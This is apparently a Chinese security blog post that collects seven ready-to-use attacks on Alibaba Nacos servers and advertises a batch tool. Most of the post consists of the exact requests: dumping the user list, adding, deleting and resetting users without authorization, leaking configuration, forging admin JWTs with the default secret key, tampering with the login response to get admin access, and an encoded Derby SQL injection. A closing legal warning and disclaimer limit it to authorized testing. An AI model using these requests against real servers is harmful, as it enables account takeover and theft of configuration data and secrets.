Nacos 漏洞利用姿势大全-附批量工具

Nacos 漏洞利用姿势大全-附批量工具

原创 丁永博 丁永博的成长日记 2024-04-17 23:59

Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

指纹:app=”nacos”

默认密码nacos nacos就不说了

漏洞1获取已有的用户列表的账号和密码

在路径后面加上/nacos/v1/auth/users?pageNo=1&pageSize=9可以获取到已有的用户名和密码,
可以
把User-Agent头改为Nacos-Server
,如图

漏洞2任意用户添加

更改提交方式为POST , 访问/nacos/v1/auth/users?username=test111&password=123456

新建一个账号test111,可以看到创建用户成功,如图

使用该账号可以发现登录成功,如图

漏洞3任意用户删除

更改提交方式为DELETE , 访问DELETE /nacos/v1/auth/users?username=test111

可以看到用户删除成功,如图

漏洞4用户密码重置

更改提交方式为PUT,访问 /nacos/v1/auth/users?accessToken=&username=test1&newPassword=test222

可以看到用户密码更新成功,如图

漏洞5配置信息泄露

在路径后面加上:/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99

漏洞6  token.secret.key默认配置(QVD-2023-6271)

SecretKey012345678901234567890123456789012345678901234567890123456789
https://jwt.io/

http://shijianchuo.wiicha.com/

在登录请求中,拦截数据包,添加Authorization信息,拦截放回包后放包

Authorization: Bearer 你的token

利用方式2:

登陆界面输入任意账户密码 ,点击登录。更改改返回包状态码跟body

{
"accessToken":
"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3NTA4Mzg3N30.mIjNX6MXNF3FgQNTl-FduWpsaTSZrOQZxTCu7Tg46ZU","tokenTtl": 18000,
"globalAdmin": true,"username":"nacos"
}

漏洞7 Nacos Derby SQL注入漏洞  (CNVD-2020-67618)

/nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73

批量工具放知识星球

小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系统罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

声明

本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

欢迎 
在看

留言

分享至朋友圈
 三连

好文推荐****